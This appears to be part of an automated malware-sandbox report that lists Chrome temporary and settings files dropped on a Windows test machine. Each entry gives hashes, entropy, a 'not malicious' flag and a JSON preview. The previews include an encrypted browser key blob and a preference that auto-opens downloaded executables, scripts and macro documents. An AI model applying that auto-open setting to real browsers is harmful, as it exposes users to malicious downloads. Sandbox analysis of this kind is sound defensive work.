Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\4b7aebcf-3332-40a7-b26f-8e60f45b8652.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	61214
Entropy (8bit):	6.07102845207324
Encrypted:	false
SSDEEP:	1536:vj71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:7711NyBTOgd0HhmAnhqj3L
MD5:	D96FF5412F997F12CFE6973A5FCE7926
SHA1:	97D61173E45CF6719B91EBB44C975DCF92400BFD
SHA-256:	8E52267DD172085E81574A428050CA06BF7D0C2D126E5F92AFF81B22F7CEB88D
SHA-512:	5480817CC751DC893B53AAE1187C2D99796FA13384111AF8854CC2260979CF31E686E0B83651CB15D59D9E26C98AE6E67413292BEB0A2DCF597F9FD3D9C25263
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\7612b50c-55a3-47bf-9b5d-287d567aad54.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	61214
Entropy (8bit):	6.0710243822240555
Encrypted:	false
SSDEEP:	1536:4e71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:h711NyBTOgd0HhmAnhqj3L
MD5:	C23FA9F91E50E4F0FCEAD46BEE145F74
SHA1:	EE0218A1227FE90C35019532AC40E8ADEC1B3569
SHA-256:	EE97065D5DFD435B63543767227C309C7968316249B372EF21DDE1811765FC19
SHA-512:	282B6713F8AABB38D57831C44DA0BF5D9316BE360A185414DAB4BD96A4E7795807FC511DBD6144B170F5C457D1CF82EFF8403D65EA7D5B6831D496193007E179
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\80ba0658-c11b-4b9c-a097-e96dbb5cada0.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.071020531075422
Encrypted:	false
SSDEEP:	1536:nD71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:D711NyBTOgd0HhmAnhqj3L
MD5:	BE591546D722E679933F2373F6BB4F15
SHA1:	E16F50F2ADD2C81EEA52C20A6A8AE41A6A867FD3
SHA-256:	FB83F5C9A50EDF1D9DA9CB43EE4EB4915680808CDC80B51529E3CB5A4E89E162
SHA-512:	FEA68B1DCB15139CA8BE32E4036989E474789E8FB19A933AA412120A883B6B29C68AA8B810C94E0D0C5CCCC2C1B71CF1517338E2A8F23D03BDB4D8966F326943
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\8656df9c-5b11-458b-80e3-19636739c760.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	120298
Entropy (8bit):	6.05696171880448
Encrypted:	false
SSDEEP:	3072:1YatS55TnNtTFS788k8oZ0711NyBTOgd0HhmAnhqj3k:1sHD3FS7V2AXNyTOpBmAh4k
MD5:	BBCC59458CE8AF4690CBDC2D3742457E
SHA1:	983453852CFC5CCC49AC746D8BB45882ADA8B856
SHA-256:	C4AAC06A379D9FC18506DF25E92C3F70486C13EC9C9BBFE66C635CECA0116698
SHA-512:	351E41B420561777D3DDE4ADE12CE55BA4BB60DBE450F5AE13B938FFE32EA621904EC532706749EA55E342B17DA9CC995D2979A2DF6E806804C0E361A95E2662
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.661304209804544e+12,"network":1.661271814e+12,"ticks":151767576.0,"uncertainty":9000880.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxa

C:\Users\user\AppData\Local\Google\Chrome\User Data\92e44750-f4f5-44b7-812f-6df883e01c13.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.07102606382994
Encrypted:	false
SSDEEP:	1536:vR71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:5711NyBTOgd0HhmAnhqj3L
MD5:	18C766DD11B7447C24CD8E0DCF43C68D
SHA1:	39FE7DEC794B537657D098E768388ADFE724E36C
SHA-256:	AB8D9E841BFC547B51427AE8B3FC84818544A3DAC47FBC01A186907CCA3EE3DB
SHA-512:	DD2A7D5549868FA76974E8508DA5D5756B0F3DD554CA8A8FAF7D5B0685B0826CEFCBF57EE1F3C964E45A3FD128E8C4EEBF1D1F05F8E90730222BE4CEDD6757C1
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\94a4b97e-5bd6-4eb3-85c1-8303db2018d7.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	61214
Entropy (8bit):	6.07102606382994
Encrypted:	false
SSDEEP:	1536:vR71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:5711NyBTOgd0HhmAnhqj3L
MD5:	18C766DD11B7447C24CD8E0DCF43C68D
SHA1:	39FE7DEC794B537657D098E768388ADFE724E36C
SHA-256:	AB8D9E841BFC547B51427AE8B3FC84818544A3DAC47FBC01A186907CCA3EE3DB
SHA-512:	DD2A7D5549868FA76974E8508DA5D5756B0F3DD554CA8A8FAF7D5B0685B0826CEFCBF57EE1F3C964E45A3FD128E8C4EEBF1D1F05F8E90730222BE4CEDD6757C1
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\951d6187-4062-4ce6-97f6-9fe2c93287ae.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	120206
Entropy (8bit):	6.05665019437949
Encrypted:	false
SSDEEP:	3072:uYatS55TnNtTFS788k8oZ0711NyBTOgd0HhmAnhqj3k:usHD3FS7V2AXNyTOpBmAh4k
MD5:	F9630F3E11869F933C5043453DE3213A
SHA1:	213032BAA9D74687C8F4AB85AD681D383366CE2B
SHA-256:	A028F95C5D65A34211DA44CB01308C8A57244B748C5D765216372D820086BE6D
SHA-512:	3148C8316E18BEFBE20B874A0CDBD15A94410E4D805430D0B631655D89210548987D2D84F041E9342851645B67C8AD2CD70BEF2A1B3CAAD35971719624F81DC1
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.661304209804544e+12,"network":1.661271814e+12,"ticks":151767576.0,"uncertainty":9000880.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxa

C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	3.254162526001658
Encrypted:	false
SSDEEP:	3:FkXft0xE1n:+ftIE1n
MD5:	BD4642AD6C750A12D912B20BCB92E14D
SHA1:	C549F0F48FDD4FBC62E51AC26D7E185160CE2123
SHA-256:	4FD71FE78DFE203137C89C9FB0734358FF432F2BC83338112DC7B830F9B30F2C
SHA-512:	04410D12EF327614C3AF1251C9906BFEB2977211A7F53CBB08A8C01F9465A382CD001E51AB936A0D196D359F1DECDDAEAF5E7D1DBD49CE5F4FF91BF5C332B6CF
Malicious:	false
Reputation:	unknown
Preview:	sdPC....................s}.....M..2.!..%

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\40ac8708-f087-43d1-8d4f-461919b5f4e1.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9379
Entropy (8bit):	5.15360139042458
Encrypted:	false
SSDEEP:	192:YXK1XcF88yy+F3p7YEkE8kjTLmbdplKiWQbDYpqn0ttjEsXtSct:YQiyx36C5PAYtIsXtSct
MD5:	E6EF9546A3A16579E00679DD4CC49CC8
SHA1:	13664512E031C108F0464B6FD629E2BF8DCD78BC
SHA-256:	AA7BC0838F2BE1F7BE07BD9DAE731E30AE13BC2C27A4398838190DBB6C67DCFB
SHA-512:	DDE15A1B6E7AFBE38AC497EA3996B1B681476A441BDFCAAB1D3BC8E8B0D83D09301CA9DF9E274314738D4C77C0DFF8C57AEDF1B65F9AD921D46540A5FA07432F
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305777805843938","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777805837954"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\4c9ea766-c6d7-4488-8a73-0ed3eb966f29.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	14276
Entropy (8bit):	5.573472085749024
Encrypted:	false
SSDEEP:	384:2ZoLlyXB1kXqKf/pUZNCgVLH2Hft8rU6Su4u:XLlgB1kXqKf/pUZNCgVLH2HfyrUvu9
MD5:	604BEE90001CE43E852EE1F20BC53C50
SHA1:	9AF79B4D2553F3A3D7A1A8B5E1C2E8DF3B3BD877
SHA-256:	83FCC4CCFA392A2D1CB4D305F507D0C15BEB6E1E2520ABD1BCE091DADF788678
SHA-512:	1EF04AEF73E58D39936B7BF7FC9AF877ACD2E7EE20F61BC7B1EFFE55902E1DD787F2D2628FFEEE6CC02D599712D237D46598B50049955ECDA8E38361DD19D79A
Malicious:	false
Reputation:	unknown
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13305777803586872","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"web

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\658f53b0-80f0-4f6d-90a4-bfcc90975667.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9162
Entropy (8bit):	5.147859569888111
Encrypted:	false
SSDEEP:	192:YXK1XcF88yy+F3p7YlkjULmbdplKiWQbDYpqn0ttjEsXtSc+:YQiyx36OEAYtIsXtSc+
MD5:	DFE72080023DD1EB44CF022FA1AA87EF
SHA1:	073266D0566369DEF7901D004A938266873AFC56
SHA-256:	038799F31B6C969D85FA90CD5F738EADE01FB4D76A79C4A31543BB9C1C73D652
SHA-512:	B3FBAB7C537B944527C4F5AA0F5CE8A97B53C0290BE13A31B33D116EA67E93A341900C650FE235925E325180B810D9DA04B81F917DB9AA855FBE9E70F3BB805C
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305777805843938","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777805837954"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6fc2808a-4b06-4a4e-87c2-661fc65ec357.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9443
Entropy (8bit):	5.153616258639887
Encrypted:	false
SSDEEP:	192:YXK1XcF88yy+F3p7Y7kRukjesmbdplKiWQbDYpqn0ttjEsXtSct:YQiyx36OTRAYtIsXtSct
MD5:	52795657601412C9945048B407D43940
SHA1:	A6ACD13A639334C794C9F1C8E005CB997D40EA16
SHA-256:	313611AE60FAC8C53E045FF8B2A912EEC8E84323BD403F2A196071E4EA69E7A5
SHA-512:	484607C731AC8FD23325AF0392C1A7D3C3EB994D37CAA49FAF38A033D537DDCDBB69350966316FE17AD6442317E49943F42351CC2839E1F013D0701A3F40FF8C
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305777805843938","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777805837954"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\80523c27-2d54-4107-802f-2ad4ce231515.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9379
Entropy (8bit):	5.154581786204715
Encrypted:	false
SSDEEP:	192:YXK1XcF88yy+F3p7YlkNrQkjmLmbdplKiWQbDYpqn0ttjEsXtSct:YQiyx364rN+AYtIsXtSct
MD5:	3AFE4D3D639B18C57E71C1BBAF87C630
SHA1:	B6A786E379E2A3CA637E18C765E13AB798DD8F92
SHA-256:	5AD5A24CB7EC141F652B5010B07F1BC0B6175B95CAE4B592497B27B888C99C2C
SHA-512:	0C579B8B074039B764C456192F0FBBE7CC71F95F4A10DB65DE4E54CF519235E8327B7DA0C90859860410E0217E701E16570089E8021489EF2E9B53EEDC91E620
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305777805843938","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777805837954"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\8347c8f2-263a-4ac9-8d36-0baf16e8125d.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9481
Entropy (8bit):	5.152295631823405
Encrypted:	false
SSDEEP:	192:YXK1XcF88yy+F3p7Y7kRukje/mbdplKiWQbDYpqn0ttjEsXtSct:YQiyx36OTqAYtIsXtSct
MD5:	92F9A81ECC22692924459B1098627CA4
SHA1:	BEBF88E8E681DC857C2E6BB773BEE57F32730F3A
SHA-256:	C4EA088E5A2D120294BFB92955852862F3E2D2C70483CE2FACBF9B3FE98A65E8
SHA-512:	3E61A35381183091F8A89665B327CF47F4BD4615E8B61D627D36D745A0C11E18282DF2CAE227B88552EAF74F919F487FBD45C41A97E7D48055D095D465F4AEF1
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305777805843938","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777805837954"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\8df5ee22-daca-4b7c-bc10-8ce7cc32946b.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9443
Entropy (8bit):	5.153616258639887
Encrypted:	false
SSDEEP:	192:YXK1XcF88yy+F3p7Y7kRukjesmbdplKiWQbDYpqn0ttjEsXtSct:YQiyx36OTRAYtIsXtSct
MD5:	52795657601412C9945048B407D43940
SHA1:	A6ACD13A639334C794C9F1C8E005CB997D40EA16
SHA-256:	313611AE60FAC8C53E045FF8B2A912EEC8E84323BD403F2A196071E4EA69E7A5
SHA-512:	484607C731AC8FD23325AF0392C1A7D3C3EB994D37CAA49FAF38A033D537DDCDBB69350966316FE17AD6442317E49943F42351CC2839E1F013D0701A3F40FF8C
Malicious:	false
Reputation:	unknown
